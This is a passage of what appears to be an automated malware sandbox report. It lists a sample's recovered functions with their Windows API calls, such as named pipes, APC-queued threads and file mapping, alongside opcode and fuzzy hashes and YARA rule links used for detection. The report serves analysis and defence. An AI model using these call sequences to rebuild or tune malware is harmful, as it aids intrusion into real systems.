                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 2124651672-0
                                                            • Opcode ID: cd0e12e5bdb834a9b7e92ad1377cca4be18a1a316fbcf1052eb3aac7f09c1471
                                                            • Instruction ID: b8cf68f7c3a81dccb3891b102a3773097fa30eddc8b710d678626e50899b6743
                                                            • Opcode Fuzzy Hash: cd0e12e5bdb834a9b7e92ad1377cca4be18a1a316fbcf1052eb3aac7f09c1471
                                                            • Instruction Fuzzy Hash: 3221FB35901208EFCB118FA4D884A9EBBB8FF49711B11855AF815A7250D734EE11DBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA87FC, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 04BA881E
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 04BA8862
                                                            • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 04BA88A5
                                                            • CloseHandle.KERNEL32(?,?,?,?,?), ref: 04BA88C8
                                                              • Part of subcall function 04BADD60: GetTickCount.KERNEL32 ref: 04BADD70
                                                              • Part of subcall function 04BADD60: CreateFileW.KERNEL32(04BA1DEA,80000000,00000003,04BCC1A8,00000003,00000000,00000000,?,04BA1DEA,?), ref: 04BADD8D
                                                              • Part of subcall function 04BADD60: GetFileSize.KERNEL32(04BA1DEA,00000000,?,00000001,?,04BA1DEA,?), ref: 04BADDC0
                                                              • Part of subcall function 04BADD60: CreateFileMappingA.KERNEL32(04BA1DEA,04BCC1A8,00000002,00000000,00000000,04BA1DEA), ref: 04BADDD4
                                                              • Part of subcall function 04BADD60: lstrlen.KERNEL32(04BA1DEA,?,04BA1DEA,?), ref: 04BADDF0
                                                              • Part of subcall function 04BADD60: lstrcpy.KERNEL32(?,04BA1DEA), ref: 04BADE00
                                                              • Part of subcall function 04BADD60: HeapFree.KERNEL32(00000000,04BA1DEA,?,04BA1DEA,?), ref: 04BADE1B
                                                              • Part of subcall function 04BADD60: CloseHandle.KERNEL32(04BA1DEA,?,00000001,?,04BA1DEA), ref: 04BADE2D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                                                            • String ID:
                                                            • API String ID: 3239194699-0
                                                            • Opcode ID: 83a3530ab671e540684a9283b6a3bf884ec97ab91573dd96be8e8c8dd6850a52
                                                            • Instruction ID: b77a6f779808917c3fd00a25e1e0ef0353b75e4be7755700f5297a31661911c3
                                                            • Opcode Fuzzy Hash: 83a3530ab671e540684a9283b6a3bf884ec97ab91573dd96be8e8c8dd6850a52
                                                            • Instruction Fuzzy Hash: 81215A31900208DBEF21EFA5DD88DEE7BB9FF88394F140166F915D2160EB30A925CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA6CE6, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BBB54C: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,04BA138B,00000000,04BCC16C,00000000), ref: 04BBB572
                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04BA6D38
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,04BBE1A6,?), ref: 04BA6D4A
                                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,04BBE1A6,?), ref: 04BA6D62
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,04BBE1A6,?), ref: 04BA6D7D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleModuleNamePointerRead
                                                            • String ID:
                                                            • API String ID: 1352878660-0
                                                            • Opcode ID: 96b85b393da12b4bf604dffd120379a014cf75b3944c8a4aa0c33fbf3963c9d2
                                                            • Instruction ID: f9722dcd0c121d3cf22d3d689df8176b020b3eeb61f1149cb8f9a8c9f27ca565
                                                            • Opcode Fuzzy Hash: 96b85b393da12b4bf604dffd120379a014cf75b3944c8a4aa0c33fbf3963c9d2
                                                            • Instruction Fuzzy Hash: AA115EB1600118BBEF20AFA5CC89EEF7F7CEF05794F184155F554E6050D770AA50DAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC100F, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000,73BB8250,73B769A0,?,?,?,04BBCD48,?,00000000,04BAEE2A), ref: 04BC101F
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,04BBCD48,?,00000000,04BAEE2A), ref: 04BC1041
                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 04BC106D
                                                            • lstrcatW.KERNEL32(00000000,?), ref: 04BC1080
                                                              • Part of subcall function 04BB435F: strstr.NTDLL ref: 04BB4437
                                                              • Part of subcall function 04BB435F: strstr.NTDLL ref: 04BB448A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3712611166-0
                                                            • Opcode ID: 03c0758ed08a4ff28970ef4594d1cbe77910883bde78c42f852c2f1e6edee0a1
                                                            • Instruction ID: 63466a12f40016baf183cd4468a54bb9ac3761d80570a0f577b7924ca74dc64e
                                                            • Opcode Fuzzy Hash: 03c0758ed08a4ff28970ef4594d1cbe77910883bde78c42f852c2f1e6edee0a1
                                                            • Instruction Fuzzy Hash: C9113A72601219BFDB11AFA5DCC8CEF7BBCEF09255B008069F905A7111D735EE518BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB3628, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BB7E4A,00000000,?,?,04BB63BE,00000000,05C8B188), ref: 04BB3633
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB364B
                                                            • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04BB7E4A,00000000,?,?,04BB63BE,00000000,05C8B188), ref: 04BB368F
                                                            • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 04BB36B0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy$AllocateHeaplstrlen
                                                            • String ID:
                                                            • API String ID: 1819133394-0
                                                            • Opcode ID: b4d3008762adba5bcb63cb0c109c7d42ba9eedccb63c8b3014ee571a143b3cef
                                                            • Instruction ID: 80eb1f1a44ae7e71a6f1649f57c9546d977ed23d964f40a8a9ecf8874f7aea97
                                                            • Opcode Fuzzy Hash: b4d3008762adba5bcb63cb0c109c7d42ba9eedccb63c8b3014ee571a143b3cef
                                                            • Instruction Fuzzy Hash: 0911CA72A04218AFD7108E6ADCC4DDEBFFADB99261B450176E905D7240E674EE14C7B0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC1FF0, Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000008,?,00000008,00000000,?,?,04BA8A86,?,?,?,?,?,?,?,?,?), ref: 04BC2004
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • mbstowcs.NTDLL ref: 04BC201E
                                                            • lstrlen.KERNEL32(?,?,00000008), ref: 04BC2029
                                                            • mbstowcs.NTDLL ref: 04BC2043
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C11
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C1D
                                                              • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0C65
                                                              • Part of subcall function 04BC0BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BC0C80
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(0000002C), ref: 04BC0CB8
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?), ref: 04BC0CC0
                                                              • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0CE3
                                                              • Part of subcall function 04BC0BC5: wcscpy.NTDLL ref: 04BC0CF5
                                                              • Part of subcall function 04BC3C4A: RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                                                            • String ID:
                                                            • API String ID: 1961997177-0
                                                            • Opcode ID: e5b027e53170c42bec24b47ab23e964f8cae39c9f391e8b403805be20d3af26c
                                                            • Instruction ID: 800b4afc8587059536ec6c105931caefde1a783d1ed7fda11e6488716e7783f4
                                                            • Opcode Fuzzy Hash: e5b027e53170c42bec24b47ab23e964f8cae39c9f391e8b403805be20d3af26c
                                                            • Instruction Fuzzy Hash: 64017572900308B7DB216FA5CCC5FDF7BADEF94758F1450AAB905A7100EA75E91187A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB7D2E, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BB7D41
                                                            • lstrlen.KERNEL32(05C8AAC0), ref: 04BB7D62
                                                            • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 04BB7D7A
                                                            • lstrcpy.KERNEL32(00000000,05C8AAC0), ref: 04BB7D8C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 1929783139-0
                                                            • Opcode ID: 69ec526ad49659fb8cd088953ef0c7b6ce7d6f75c9db897f39a62c11cd82c1d0
                                                            • Instruction ID: f52970c51a14b5d09836dd4c4b5606372e4db07f5177edd9931c5a6adfacd564
                                                            • Opcode Fuzzy Hash: 69ec526ad49659fb8cd088953ef0c7b6ce7d6f75c9db897f39a62c11cd82c1d0
                                                            • Instruction Fuzzy Hash: 99018C75504244AFC711DFA9D8C4EBF7BBCEB8D641F140056E949D3241D674E904DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAD464, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • RtlInitializeCriticalSection.NTDLL(04BCC300), ref: 04BAD488
                                                            • RtlInitializeCriticalSection.NTDLL(04BCC2E0), ref: 04BAD49E
                                                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BB3914), ref: 04BAD4AF
                                                            • GetModuleHandleA.KERNEL32(0000170B), ref: 04BAD4E3
                                                              • Part of subcall function 04BA1401: GetModuleHandleA.KERNEL32(?,00000001,77109EB0,00000000,?,?,?,?,00000000,04BAD4C6), ref: 04BA1419
                                                              • Part of subcall function 04BA1401: LoadLibraryA.KERNEL32(?), ref: 04BA14BA
                                                              • Part of subcall function 04BA1401: FreeLibrary.KERNEL32(00000000), ref: 04BA14C5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                                                            • String ID:
                                                            • API String ID: 1711133254-0
                                                            • Opcode ID: 3a15ece9934aaf70ecebdc68e719350a4e1c6203b674bedb3ba64635cc8656cf
                                                            • Instruction ID: 524d012d6c0a931da9c7d9bfafa12f8dacc7cd9b28b33059517b6d163455b03f
                                                            • Opcode Fuzzy Hash: 3a15ece9934aaf70ecebdc68e719350a4e1c6203b674bedb3ba64635cc8656cf
                                                            • Instruction Fuzzy Hash: 24115E729042148FEB10DFAEE8C89057FB9F76D30570005AFD649D7240D778AC258BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA1C52, Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC1AD6: lstrlen.KERNEL32(?,?,00000000,04BA1C68), ref: 04BC1ADB
                                                              • Part of subcall function 04BC1AD6: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04BC1AF0
                                                              • Part of subcall function 04BC1AD6: wsprintfA.USER32 ref: 04BC1B0C
                                                              • Part of subcall function 04BC1AD6: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 04BC1B28
                                                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 04BA1C80
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 04BA1C8F
                                                            • CloseHandle.KERNEL32(00000000), ref: 04BA1C99
                                                            • GetLastError.KERNEL32 ref: 04BA1CA1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                                                            • String ID:
                                                            • API String ID: 4042893638-0
                                                            • Opcode ID: be7563fd55ba253e971a08b1bd0cae19aa530b22ed5a8741e48aeabbee92aa68
                                                            • Instruction ID: ab5c2ac939f83b9102dde4397cc2faafdcfc05513c9e5c4e61e7a024bc89e2be
                                                            • Opcode Fuzzy Hash: be7563fd55ba253e971a08b1bd0cae19aa530b22ed5a8741e48aeabbee92aa68
                                                            • Instruction Fuzzy Hash: C1F0F435209224BBD7612B79DCC8E9F7F6DFF057A0F104116F509EA080E674A95186B0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBD8BC, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,04BCC1A8,04BCC144), ref: 04BBD8E0
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BB3914), ref: 04BBD92B
                                                              • Part of subcall function 04BAE0F2: CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,04BC0483), ref: 04BAE109
                                                              • Part of subcall function 04BAE0F2: QueueUserAPC.KERNEL32(?,00000000,04BB5ADA,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE11E
                                                              • Part of subcall function 04BAE0F2: GetLastError.KERNEL32(00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE129
                                                              • Part of subcall function 04BAE0F2: TerminateThread.KERNEL32(00000000,00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE133
                                                              • Part of subcall function 04BAE0F2: CloseHandle.KERNEL32(00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE13A
                                                              • Part of subcall function 04BAE0F2: SetLastError.KERNEL32(00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE143
                                                            • GetLastError.KERNEL32(04BBAD22,00000000,00000000), ref: 04BBD913
                                                            • CloseHandle.KERNEL32(00000000), ref: 04BBD923
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                                            • String ID:
                                                            • API String ID: 1700061692-0
                                                            • Opcode ID: d466ec377cadfc94c3ee9ffc9c63b28f7a6b2fb2a36cd78fba51612d31004e9d
                                                            • Instruction ID: eeb6ec5086c52d970c88404315c30fdf98fb9682d462b6129d8be47971d9b3c2
                                                            • Opcode Fuzzy Hash: d466ec377cadfc94c3ee9ffc9c63b28f7a6b2fb2a36cd78fba51612d31004e9d
                                                            • Instruction Fuzzy Hash: 04F0F471345211AFF3201A79DCC8EBA3B6CEB99335B10017AF6D6D32C0D6A81C128AB4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB8EA8, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrcatW.KERNEL32(?,?), ref: 04BB8EBA
                                                              • Part of subcall function 04BB533D: CreateFileW.KERNEL32(00000000,C0000000,04BBF1B3,00000000,04BBF1B4,00000080,00000000,00000000,04BC4C6A,00000000,04BBF1B3,?), ref: 04BB537E
                                                              • Part of subcall function 04BB533D: GetLastError.KERNEL32 ref: 04BB5388
                                                              • Part of subcall function 04BB533D: WaitForSingleObject.KERNEL32(000000C8), ref: 04BB53AD
                                                              • Part of subcall function 04BB533D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 04BB53CE
                                                              • Part of subcall function 04BB533D: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 04BB53F6
                                                              • Part of subcall function 04BB533D: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 04BB540B
                                                              • Part of subcall function 04BB533D: SetEndOfFile.KERNEL32(00000001), ref: 04BB5418
                                                              • Part of subcall function 04BB533D: CloseHandle.KERNEL32(00000001), ref: 04BB5430
                                                            • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,04BAF15D,?,?,00001000,?,?,00001000), ref: 04BB8EDD
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,04BAF15D,?,?,00001000,?,?,00001000), ref: 04BB8EFF
                                                            • GetLastError.KERNEL32(?,04BAF15D,?,?,00001000,?,?,00001000), ref: 04BB8F13
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                                            • String ID:
                                                            • API String ID: 3370347312-0
                                                            • Opcode ID: 3bb461014113287dc7cd8bc5d8fac20f66a6f806f77f34b1705de2528ec48f31
                                                            • Instruction ID: c61ad9ad102c29e4ab3491d7b5f5e44f5bf22db1e61398142e8f3fb1dce17e07
                                                            • Opcode Fuzzy Hash: 3bb461014113287dc7cd8bc5d8fac20f66a6f806f77f34b1705de2528ec48f31
                                                            • Instruction Fuzzy Hash: 77F0A431244204BBDB223F60DC49FEA3B2AEF09751F100415F752E60D0E7B568219BB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC0132, Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(04BCC000,00000000), ref: 04BC013E
                                                            • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 04BC0159
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 04BC0182
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04BC01A3
                                                              • Part of subcall function 04BB42B4: SetEvent.KERNEL32(?,?,04BAE0E1), ref: 04BB42C9
                                                              • Part of subcall function 04BB42B4: WaitForSingleObject.KERNEL32(?,000000FF,?,?,04BAE0E1), ref: 04BB42E9
                                                              • Part of subcall function 04BB42B4: CloseHandle.KERNEL32(00000000,?,04BAE0E1), ref: 04BB42F2
                                                              • Part of subcall function 04BB42B4: CloseHandle.KERNEL32(?,?,?,04BAE0E1), ref: 04BB42FC
                                                              • Part of subcall function 04BB42B4: RtlEnterCriticalSection.NTDLL(?), ref: 04BB4304
                                                              • Part of subcall function 04BB42B4: RtlLeaveCriticalSection.NTDLL(?), ref: 04BB431C
                                                              • Part of subcall function 04BB42B4: CloseHandle.KERNEL32(?), ref: 04BB4338
                                                              • Part of subcall function 04BB42B4: LocalFree.KERNEL32(?), ref: 04BB4343
                                                              • Part of subcall function 04BB42B4: RtlDeleteCriticalSection.NTDLL(?), ref: 04BB434D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                                                            • String ID:
                                                            • API String ID: 1103286547-0
                                                            • Opcode ID: 38033e8d13da41e64be244b5580326d9fd62c89912be8491529ec3a4893527ce
                                                            • Instruction ID: 55341ae1abc01cd45b1f4cf84b3ef634c6e5e73288a4b75b11d230d7ad5e2322
                                                            • Opcode Fuzzy Hash: 38033e8d13da41e64be244b5580326d9fd62c89912be8491529ec3a4893527ce
                                                            • Instruction Fuzzy Hash: CFF0C831740311BBE6302B71ECCAF4A3F69EB49B65F05005AB604F7290C968EC15CB70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA3C61, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(05C8B148), ref: 04BA3C6A
                                                            • Sleep.KERNEL32(0000000A,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BA3C74
                                                            • HeapFree.KERNEL32(00000000,?,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BA3C9C
                                                            • RtlLeaveCriticalSection.NTDLL(05C8B148), ref: 04BA3CBA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                            • String ID:
                                                            • API String ID: 58946197-0
                                                            • Opcode ID: 75dcfdeace7bc128d422fea6e69b81d8de67d7ea90cee24e95c2959c21e5540e
                                                            • Instruction ID: 520153cf2629da983c49acbdc23d16547590c9dd3fb8903ce3b4f7671f204b49
                                                            • Opcode Fuzzy Hash: 75dcfdeace7bc128d422fea6e69b81d8de67d7ea90cee24e95c2959c21e5540e
                                                            • Instruction Fuzzy Hash: 98F03A30604340AFEB209B65ECC9F1A3BB4FB18745F048446F85AEB291E628FC20CB25
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB0FF1, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(05C8B148), ref: 04BB0FFA
                                                            • Sleep.KERNEL32(0000000A,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB1004
                                                            • HeapFree.KERNEL32(00000000,?,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB1032
                                                            • RtlLeaveCriticalSection.NTDLL(05C8B148), ref: 04BB1047
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                            • String ID:
                                                            • API String ID: 58946197-0
                                                            • Opcode ID: 788c921a64c884338b9857cdf1a4d556474556db121ee3a86367779d1ed75f72
                                                            • Instruction ID: 6d28ef3b041cc6ae2999ccd79cbc357aeeedc5ca32d01e8bdc30e87b9e32eeef
                                                            • Opcode Fuzzy Hash: 788c921a64c884338b9857cdf1a4d556474556db121ee3a86367779d1ed75f72
                                                            • Instruction Fuzzy Hash: 44F0D474601244DFEB188F68E8E9F293B74FB18746B44404AE84AEB390C778FC00CA65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB864A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.NTDLL(?,?,?), ref: 04BB868E
                                                            • StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 04BB86A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: 0x
                                                            • API String ID: 3510742995-3225541890
                                                            • Opcode ID: 57514487c463cc4279d06d861392230430d68a3f85a9bcaefe97a43ba75c9ff8
                                                            • Instruction ID: 26e054f1ae7664dfb07e99a7c00650279052def1ab52efcfa89045b1b4b6c064
                                                            • Opcode Fuzzy Hash: 57514487c463cc4279d06d861392230430d68a3f85a9bcaefe97a43ba75c9ff8
                                                            • Instruction Fuzzy Hash: 61017135900119BBDB01EFA8D8459EFBBBDEB48308F004455E915E7210EBB4EA09CBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA1D77, Relevance: 5.2, APIs: 4, Instructions: 154memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 04BA1DD6
                                                            • CloseHandle.KERNEL32(?,?,00000100,?,?), ref: 04BA1E24
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000094,04BA71A5,00000000,?,04BA1D00,00000000,?,04BAB6F6,00000000,?,04BAA4A1,00000000), ref: 04BA2168
                                                            • GetLastError.KERNEL32(?,?), ref: 04BA23AF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseErrorFreeHandleHeapLastmemset
                                                            • String ID:
                                                            • API String ID: 2333114656-0
                                                            • Opcode ID: f9c2381ae905ccc8bfe94d02c41cf2ba32d6cb31e118922e9409de3c92651d00
                                                            • Instruction ID: 727b1e1335eb4ee22bde5fcd366582f19e9e7cc916f86ea723f0a88f49824025
                                                            • Opcode Fuzzy Hash: f9c2381ae905ccc8bfe94d02c41cf2ba32d6cb31e118922e9409de3c92651d00
                                                            • Instruction Fuzzy Hash: E941E83160C118FEEB256E74CC45FEF3BADEB46750F0040E2F905A6250E671F5719AA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA68AD, Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID:
                                                            • API String ID: 2221118986-0
                                                            • Opcode ID: e814afb60deb28ff2095223114efd1503a7e1f25bef8475630c8f7fa2f334d9b
                                                            • Instruction ID: cf1e4f79a11d51771d80d3c057429611c61814b5bc96dc28fccb14dc0aa7404d
                                                            • Opcode Fuzzy Hash: e814afb60deb28ff2095223114efd1503a7e1f25bef8475630c8f7fa2f334d9b
                                                            • Instruction Fuzzy Hash: 9021AEF2504509BFCB249F60DC80A667B39FF0D318B480199E9C586810D772F8B1DBD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB5CE8, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,04BB786C,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,04BA908A), ref: 04BB5CF4
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                              • Part of subcall function 04BC45A5: StrChrA.SHLWAPI(00000000,0000002F,00000000,00000000,04BB5D22,00000000,00000001,00000001,?,?,04BB786C,00000000,00000000,00000000,00000008,0000EA60), ref: 04BC45B3
                                                              • Part of subcall function 04BC45A5: StrChrA.SHLWAPI(00000000,0000003F,?,?,04BB786C,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,04BA908A,00000008,04BBB24C), ref: 04BC45BD
                                                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04BB786C,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 04BB5D52
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04BB5D62
